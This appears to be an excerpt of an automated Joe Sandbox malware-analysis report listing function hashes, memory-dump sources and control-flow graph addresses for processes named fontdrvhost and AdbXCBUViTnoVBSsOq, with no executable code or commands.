                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c745e19293ce86e46fd315573533008325cbc6f2e372a6baf71e879248ff9dd6
                                                                                                                    • Instruction ID: b12787501b74b03b3a058a8cd2a39bc376e670c773682589b5afae56a6dfca95
                                                                                                                    • Opcode Fuzzy Hash: c745e19293ce86e46fd315573533008325cbc6f2e372a6baf71e879248ff9dd6
                                                                                                                    • Instruction Fuzzy Hash: 38E01218B2D9078AF6A9C554C0B227A05956F53348F6005BECA4EC23CACE1CA90272A6
                                                                                                                    Function 00007FFD34550CBF Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: bd072c1f3563f60fc0948a9685f9e56e45077c5896cc90f2d30f2cd135a1f2bb
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: EDE01735F0920ACBEB01EB54C4D46BEB7B1EB52721F1086B5C502C7289DA7CA684DA80
                                                                                                                    Function 00007FFD345506A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: 61e309f1262cc28114f4197f4fa8267df00c54bf876b12e65d6d38bcddf4ae3b
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: A1C04C06F5A51F01F417716E54E60FDB1506FD7A60FD511F2D70ED00C5AC4DA0D5A156
                                                                                                                    Function 00007FFD345512E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: ef45327f7432be439e3c65b335c1542391b5c677049bb7c0f908d8ed1333161a
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 1EC08C309108088FC908EB28C88481433A0FB0A200BC600D0E00AC7170E219DCC1C740
                                                                                                                    Function 00007FFD3494333B Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction ID: 584f2bd43c10ac0fb37a9bb6d52206684d4944329ab22a1311d06cc798a2f043
                                                                                                                    • Opcode Fuzzy Hash: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction Fuzzy Hash: B5D0C914B0C61785F57DC626C0F023E61905F0B740EE4403DC29FC1ED9CD1D78017222
                                                                                                                    Function 00007FFD3494AFC0 Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction ID: 00c1428d9911ced668c157a276569234a56116e865c8be919f70a6388dcd9ad3
                                                                                                                    • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction Fuzzy Hash: FEC002207548559FD798DB09C0E5A3872D1FF4E301B9040B8E14BCB3A9C92CA845A620
                                                                                                                    Function 00007FFD345559C7 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e07570c139ba903f60faee86b7996e5019c602f103a0698bd4de0597cf1848a
                                                                                                                    • Instruction ID: 740b03e8763ee2466f223ec84abcaba5dd3ef7a778192593ad50fd0cb5716c04
                                                                                                                    • Opcode Fuzzy Hash: 5e07570c139ba903f60faee86b7996e5019c602f103a0698bd4de0597cf1848a
                                                                                                                    • Instruction Fuzzy Hash: D4C04C02F1985706F16A6398543167E88466B44745F9501B5E50EDA6C6CD5C9F0253C6
                                                                                                                    Function 00007FFD345506C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: 21ce8d407170d803c709e54e9fc41d3268e142c31d74f4a46492cf06ae1a56fe
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 90B01200D5640F00A405317A08D60F470505F46100FC010F0D60EC0085A84D60942242
                                                                                                                    Function 00007FFD34942871 Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed35ec1346cc584f31cde17d657c54f0f2fe37f7d96f944b514d113f83dc0509
                                                                                                                    • Instruction ID: 4cf0d399e401924262fb2d8fa052a0b6a5f42f20e9db54247cae85d1d11343f9
                                                                                                                    • Opcode Fuzzy Hash: ed35ec1346cc584f31cde17d657c54f0f2fe37f7d96f944b514d113f83dc0509
                                                                                                                    • Instruction Fuzzy Hash: A0B00200F0C60357F57554B444F507D00411B473D5A540539D71BCE3DBED9C78503175
                                                                                                                    Function 00007FFD34947C31 Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2aebecdd2e36bf1967354eff32048307838e4e4d2e178bc7a3520eb964c32095
                                                                                                                    • Instruction ID: 569767a039c15f73955f1914414e2f8a7094f4e86909590b90dd0e143cfd3c60
                                                                                                                    • Opcode Fuzzy Hash: 2aebecdd2e36bf1967354eff32048307838e4e4d2e178bc7a3520eb964c32095
                                                                                                                    • Instruction Fuzzy Hash: 5BB00240F4C20B56E56998B448E507D50410B46295A941AB9971AC53D7DC9C6D4176B1

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD345509B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 5913151bfae104ee612e75a017b0734f6d07f181f3420128bf611805d2343c36
                                                                                                                    • Instruction ID: 524e2476f3e403db459d92ce047f28cc99e69ffd89796f0eb748b69dcd34a6d6
                                                                                                                    • Opcode Fuzzy Hash: 5913151bfae104ee612e75a017b0734f6d07f181f3420128bf611805d2343c36
                                                                                                                    • Instruction Fuzzy Hash: C1417107F0C56267E92A33FD74611FE9B889FA1379B484677E14DD90E38D0CE88582E5

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:27.8%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:18
                                                                                                                    Total number of Limit Nodes:3
                                                                                                                    execution_graph 24195 7ffd345a4748 24198 7ffd345a3030 24195->24198 24197 7ffd345a4756 24199 7ffd345a7a70 24198->24199 24202 7ffd345a7b0c 24199->24202 24203 7ffd345a73b0 24199->24203 24201 7ffd345a7b00 24201->24197 24202->24197 24205 7ffd345a83e0 24203->24205 24204 7ffd345a8595 24205->24204 24208 7ffd345a7040 24205->24208 24207 7ffd345a84bf 24207->24201 24209 7ffd345a8810 24208->24209 24212 7ffd345a7048 24209->24212 24211 7ffd345a8819 24211->24207 24214 7ffd345a8840 24212->24214 24213 7ffd345a93e4 24213->24211 24214->24213 24215 7ffd345a9593 GetSystemInfo 24214->24215 24216 7ffd345a95ce 24215->24216 24216->24211

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD34560D48 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 779 7ffd34560d48-7ffd34560dd9 call 7ffd345607d0 788 7ffd34560de3-7ffd34560e41 779->788 793 7ffd34560e59-7ffd34560eb9 788->793 798 7ffd34560ebb-7ffd34560f05 793->798 799 7ffd34560e48-7ffd34560e54 793->799 804 7ffd34560f1e 798->804 805 7ffd34560f07-7ffd34560f1d 798->805 799->788 800 7ffd34560e56 799->800 800->793 806 7ffd34560f1f-7ffd34560f67 804->806 805->804 805->806 811 7ffd34560f6f-7ffd34561050 806->811
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 19c197f870f26808b5306a833dbec9c0f0cde280cccdfe8f010668778577d822
                                                                                                                    • Instruction ID: db180e427b3e77f73547de47566d1eadf90679b7e652f49af5defd9a8f379558
                                                                                                                    • Opcode Fuzzy Hash: 19c197f870f26808b5306a833dbec9c0f0cde280cccdfe8f010668778577d822
                                                                                                                    • Instruction Fuzzy Hash: DD91C476A0CA9D8FE799EB68C8657A97FE1FB56310F4001BAD049D72E2DB7D5804C700
                                                                                                                    Function 00007FFD34951E10 Relevance: .5, Instructions: 504COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 83f4d6a9548f4d22d653c18239d9bb8b54da1cd4bdcb81a0b53bd08e30157610
                                                                                                                    • Instruction ID: dbfd5eb13a0505e8b5ab69fec5e67ecd2652ce79468650fd7ea125a08cf115aa
                                                                                                                    • Opcode Fuzzy Hash: 83f4d6a9548f4d22d653c18239d9bb8b54da1cd4bdcb81a0b53bd08e30157610
                                                                                                                    • Instruction Fuzzy Hash: E5F1F730B0C64D8FD749DB18D899AB977E1FF86314B2441AED04ECB296DA35EC42CB51
                                                                                                                    Function 00007FFD34560E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e197684f1b8f14084f0c1ba1bf352555155033e7e913d463d227c89c5575e086
                                                                                                                    • Instruction ID: 89528f41167956b7cb4f11db3bd9bbc43cf3d37a387c0637496c389323e8d054
                                                                                                                    • Opcode Fuzzy Hash: e197684f1b8f14084f0c1ba1bf352555155033e7e913d463d227c89c5575e086
                                                                                                                    • Instruction Fuzzy Hash: 8351B376A18A9E8BE798DB5C84657A9BFE1FB56320F8002BAD049D76D1CBB91414C700
                                                                                                                    Function 00007FFD34570CFC Relevance: 8.4, Strings: 6, Instructions: 942COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ffd34570cfc-7ffd34570cfd 2 7ffd34570cff-7ffd34570d14 0->2 3 7ffd34570d18-7ffd34570d2a 0->3 2->3 7 7ffd34571259-7ffd3457128f 2->7 6 7ffd34570d30-7ffd34570e03 3->6 36 7ffd34570e34-7ffd34570e83 6->36 37 7ffd34570e05-7ffd34570e2e 6->37 15 7ffd34571291-7ffd345712b5 7->15 16 7ffd34571308-7ffd3457133d 7->16 15->16 26 7ffd34571343-7ffd34571405 16->26 27 7ffd34571491-7ffd345714bb 16->27 89 7ffd3457144c-7ffd3457144f 26->89 90 7ffd34571407-7ffd3457144a 26->90 34 7ffd345714bd-7ffd345714da 27->34 35 7ffd34571507-7ffd3457150a 27->35 40 7ffd345714e0-7ffd34571505 34->40 41 7ffd3457164b-7ffd34571653 34->41 42 7ffd34571511-7ffd34571546 35->42 70 7ffd34570e8f-7ffd34570ec7 36->70 71 7ffd34570e85-7ffd34570e8a 36->71 37->36 40->35 53 7ffd34571654-7ffd34571659 41->53 68 7ffd345715ec-7ffd34571602 42->68 69 7ffd3457154c-7ffd3457159f 42->69 57 7ffd3457165b-7ffd3457166f 53->57 58 7ffd34571607-7ffd34571622 53->58 61 7ffd3457180d-7ffd3457180e 57->61 79 7ffd34571629-7ffd34571644 58->79 64 7ffd34571815-7ffd3457182a 61->64 65 7ffd34571810 call 7ffd345724d8 61->65 65->64 68->61 69->79 98 7ffd345715a5-7ffd345715b0 69->98 91 7ffd34570ed3-7ffd34570f0b 70->91 92 7ffd34570ec9-7ffd34570ece 70->92 76 7ffd34571243-7ffd34571253 71->76 76->6 76->7 79->41 93 7ffd34571464-7ffd34571465 89->93 94 7ffd34571451-7ffd34571462 89->94 97 7ffd34571471-7ffd3457148b 90->97 111 7ffd34570f0d-7ffd34570f12 91->111 112 7ffd34570f17-7ffd34570f4f 91->112 92->76 93->97 94->97 97->26 97->27 103 7ffd34570b5d-7ffd34570b9c 98->103 104 7ffd345715b6-7ffd345715c0 98->104 120 7ffd34570b9e-7ffd34570cfb 103->120 104->53 106 7ffd345715c6-7ffd345715e6 104->106 106->68 106->69 111->76 123 7ffd34570f51-7ffd34570f56 112->123 124 7ffd34570f5b-7ffd34570f93 112->124 120->0 123->76 131 7ffd34570f9f-7ffd34570faa 124->131 132 7ffd34570f95-7ffd34570f9a 124->132 136 7ffd34570fc0-7ffd34570fd7 131->136 137 7ffd34570fac-7ffd34570fbf 131->137 132->76 142 7ffd34570fe3-7ffd3457101b 136->142 143 7ffd34570fd9-7ffd34570fde 136->143 137->136 150 7ffd3457101d-7ffd34571022 142->150 151 7ffd34571027-7ffd3457105f 142->151 143->76 150->76 158 7ffd34571061-7ffd34571066 151->158 159 7ffd3457106b-7ffd345710a3 151->159 158->76 166 7ffd345710af-7ffd345710e7 159->166 167 7ffd345710a5-7ffd345710aa 159->167 175 7ffd345710f3-7ffd3457112b 166->175 176 7ffd345710e9-7ffd345710ee 166->176 167->76 183 7ffd3457112d-7ffd34571132 175->183 184 7ffd34571137-7ffd3457116f 175->184 176->76 183->76 188 7ffd34571171-7ffd34571176 184->188 189 7ffd3457117b-7ffd345711b3 184->189 188->76 193 7ffd345711bf-7ffd345711c8 189->193 194 7ffd345711b5-7ffd345711ba 189->194 193->76 194->76
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *`4$HIa4$PXa4$P\a4$pqa4$wa4
                                                                                                                    • API String ID: 0-3421069954
                                                                                                                    • Opcode ID: e2ad78438dc4121f80adc214cbf1f205ae5323ca5b53e7aca458420e39652009
                                                                                                                    • Instruction ID: 6d9b84281cd8dfd73b30dea4efa74d4d6f2f637e7a6b21f31b9634d255965605
                                                                                                                    • Opcode Fuzzy Hash: e2ad78438dc4121f80adc214cbf1f205ae5323ca5b53e7aca458420e39652009
                                                                                                                    • Instruction Fuzzy Hash: 4462DF21F1C95A4FEB99EB2888E66B877D2FB96710F4045B9D50DC32D2DD2CBC829740
                                                                                                                    Function 00007FFD34571305 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 307 7ffd34571305-7ffd3457130f 308 7ffd34571311-7ffd3457133d 307->308 311 7ffd34571343-7ffd34571405 308->311 312 7ffd34571491-7ffd345714bb 308->312 357 7ffd3457144c-7ffd3457144f 311->357 358 7ffd34571407-7ffd3457144a 311->358 317 7ffd345714bd-7ffd345714da 312->317 318 7ffd34571507-7ffd3457150a 312->318 321 7ffd345714e0-7ffd34571505 317->321 322 7ffd3457164b-7ffd34571653 317->322 323 7ffd34571511-7ffd34571546 318->323 321->318 330 7ffd34571654-7ffd34571659 322->330 342 7ffd345715ec-7ffd34571602 323->342 343 7ffd3457154c-7ffd3457159f 323->343 333 7ffd3457165b-7ffd3457166f 330->333 334 7ffd34571607-7ffd34571622 330->334 336 7ffd3457180d-7ffd3457180e 333->336 349 7ffd34571629-7ffd34571644 334->349 339 7ffd34571815-7ffd3457182a 336->339 340 7ffd34571810 call 7ffd345724d8 336->340 340->339 342->336 343->349 363 7ffd345715a5-7ffd345715b0 343->363 349->322 359 7ffd34571464-7ffd34571465 357->359 360 7ffd34571451-7ffd34571462 357->360 362 7ffd34571471-7ffd3457148b 358->362 359->362 360->362 362->311 362->312 367 7ffd34570b5d-7ffd34570b9c 363->367 368 7ffd345715b6-7ffd345715c0 363->368 379 7ffd34570b9e-7ffd34570cfd 367->379 368->330 370 7ffd345715c6-7ffd345715e6 368->370 370->342 370->343 406 7ffd34570cff-7ffd34570d14 379->406 407 7ffd34570d18-7ffd34570d2a 379->407 406->407 411 7ffd34571259-7ffd3457128f 406->411 410 7ffd34570d30-7ffd34570e03 407->410 429 7ffd34570e34-7ffd34570e83 410->429 430 7ffd34570e05-7ffd34570e2e 410->430 419 7ffd34571291-7ffd345712b5 411->419 420 7ffd34571308-7ffd3457130f 411->420 419->420 420->308 438 7ffd34570e8f-7ffd34570ec7 429->438 439 7ffd34570e85-7ffd34570e8a 429->439 430->429 444 7ffd34570ed3-7ffd34570f0b 438->444 445 7ffd34570ec9-7ffd34570ece 438->445 440 7ffd34571243-7ffd34571253 439->440 440->410 440->411 449 7ffd34570f0d-7ffd34570f12 444->449 450 7ffd34570f17-7ffd34570f4f 444->450 445->440 449->440 454 7ffd34570f51-7ffd34570f56 450->454 455 7ffd34570f5b-7ffd34570f93 450->455 454->440 459 7ffd34570f9f-7ffd34570faa 455->459 460 7ffd34570f95-7ffd34570f9a 455->460 462 7ffd34570fc0-7ffd34570fd7 459->462 463 7ffd34570fac-7ffd34570fbf 459->463 460->440 466 7ffd34570fe3-7ffd3457101b 462->466 467 7ffd34570fd9-7ffd34570fde 462->467 463->462 471 7ffd3457101d-7ffd34571022 466->471 472 7ffd34571027-7ffd3457105f 466->472 467->440 471->440 476 7ffd34571061-7ffd34571066 472->476 477 7ffd3457106b-7ffd345710a3 472->477 476->440 481 7ffd345710af-7ffd345710e7 477->481 482 7ffd345710a5-7ffd345710aa 477->482 486 7ffd345710f3-7ffd3457112b 481->486 487 7ffd345710e9-7ffd345710ee 481->487 482->440 491 7ffd3457112d-7ffd34571132 486->491 492 7ffd34571137-7ffd3457116f 486->492 487->440 491->440 496 7ffd34571171-7ffd34571176 492->496 497 7ffd3457117b-7ffd345711b3 492->497 496->440 501 7ffd345711bf-7ffd345711c8 497->501 502 7ffd345711b5-7ffd345711ba 497->502 501->440 502->440
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P\a4$wa4
                                                                                                                    • API String ID: 0-1460514738
                                                                                                                    • Opcode ID: 384e9b3a12bf3263be01514c2077b26470f74b7a77a5e6d9e14b877e430a9629
                                                                                                                    • Instruction ID: 6c4d0921093eb537ccd41be173dece6e49b17f24ad1e1c11d5cd7ce8fa63be1c
                                                                                                                    • Opcode Fuzzy Hash: 384e9b3a12bf3263be01514c2077b26470f74b7a77a5e6d9e14b877e430a9629
                                                                                                                    • Instruction Fuzzy Hash: DD91A131F1C94A4FEB59EB2888E167877E2FF99310B5445B9D44ED32C2DE2CAC429741
                                                                                                                    Function 00007FFD345A7048 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34591000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 300efedec8eef7fb36685a8dc4fe267c86eee1a70a08d8a3a9e513b7fb115647
                                                                                                                    • Instruction ID: 4a20a8fd916d779a7d2ada563bd4881825b7fd43e2e5b10f6ee46f51e715cd08
                                                                                                                    • Opcode Fuzzy Hash: 300efedec8eef7fb36685a8dc4fe267c86eee1a70a08d8a3a9e513b7fb115647
                                                                                                                    • Instruction Fuzzy Hash: 35B1133190EBC84FD7579B6488616E57FB1EF57310F0941EBD089CB1E3DA286846CB62
                                                                                                                    Function 00007FFD3495A4C1 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 553 7ffd3495a4c1 554 7ffd3495a4c6-7ffd3495a4ce 553->554 555 7ffd3495a651-7ffd3495a657 554->555 556 7ffd3495a4d4-7ffd3495a4e6 call 7ffd34959e90 554->556 557 7ffd3495a690-7ffd3495a695 555->557 560 7ffd3495a4b5-7ffd3495a4bc 556->560 561 7ffd3495a4e8-7ffd3495a4ed 556->561 557->553 560->557 562 7ffd3495a50f-7ffd3495a520 561->562 563 7ffd3495a4ef-7ffd3495a4f3 561->563 564 7ffd3495a69a-7ffd3495a6b5 562->564 565 7ffd3495a526-7ffd3495a53b 562->565 566 7ffd3495a5f3-7ffd3495a5f6 563->566 567 7ffd3495a4f9-7ffd3495a50a 563->567 577 7ffd3495a6bd 564->577 578 7ffd3495a6b7 564->578 565->564 568 7ffd3495a541-7ffd3495a54d 565->568 569 7ffd3495a617-7ffd3495a626 call 7ffd34958ad0 566->569 567->555 570 7ffd3495a57e-7ffd3495a594 call 7ffd34959e90 568->570 571 7ffd3495a54f-7ffd3495a566 call 7ffd349589a0 568->571 582 7ffd3495a629-7ffd3495a631 569->582 570->566 587 7ffd3495a596-7ffd3495a5a1 570->587 571->566 586 7ffd3495a56c-7ffd3495a57b call 7ffd34958ad0 571->586 579 7ffd3495a6c1-7ffd3495a723 577->579 580 7ffd3495a6bf 577->580 578->577 607 7ffd3495a72e-7ffd3495a739 579->607 608 7ffd3495a6eb-7ffd3495a727 579->608 580->579 584 7ffd3495a701-7ffd3495a703 580->584 590 7ffd3495a639-7ffd3495a63c 582->590 591 7ffd3495a74e-7ffd3495a780 584->591 592 7ffd3495a705-7ffd3495a720 584->592 586->570 587->564 593 7ffd3495a5a7-7ffd3495a5bc 587->593 595 7ffd3495a643-7ffd3495a64b 590->595 609 7ffd3495a868-7ffd3495a86d 591->609 593->564 597 7ffd3495a5c2-7ffd3495a5d5 593->597 595->555 600 7ffd3495a48a-7ffd3495a497 595->600 597->582 601 7ffd3495a5d7-7ffd3495a5f1 call 7ffd349589a0 597->601 600->595 603 7ffd3495a49d-7ffd3495a4b1 600->603 601->566 601->569 603->560 613 7ffd3495a749-7ffd3495a74c 607->613 614 7ffd3495a73c-7ffd3495a741 607->614 608->584 620 7ffd3495a881-7ffd3495a89f 609->620 621 7ffd3495a79c-7ffd3495a877 609->621 613->607 614->613 630 7ffd3495a84d-7ffd3495a865 621->630 631 7ffd3495a7c6-7ffd3495a7c9 621->631 630->609 631->630 632 7ffd3495a7cf-7ffd3495a7d2 631->632 634 7ffd3495a7d4-7ffd3495a801 632->634 635 7ffd3495a83b-7ffd3495a842 632->635 636 7ffd3495a802-7ffd3495a81c 635->636 637 7ffd3495a844-7ffd3495a84c 635->637 639 7ffd3495a822-7ffd3495a82d 636->639 640 7ffd3495a8a1-7ffd3495a8f1 call 7ffd34957180 636->640 639->640 641 7ffd3495a82f-7ffd3495a839 639->641 641->635
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
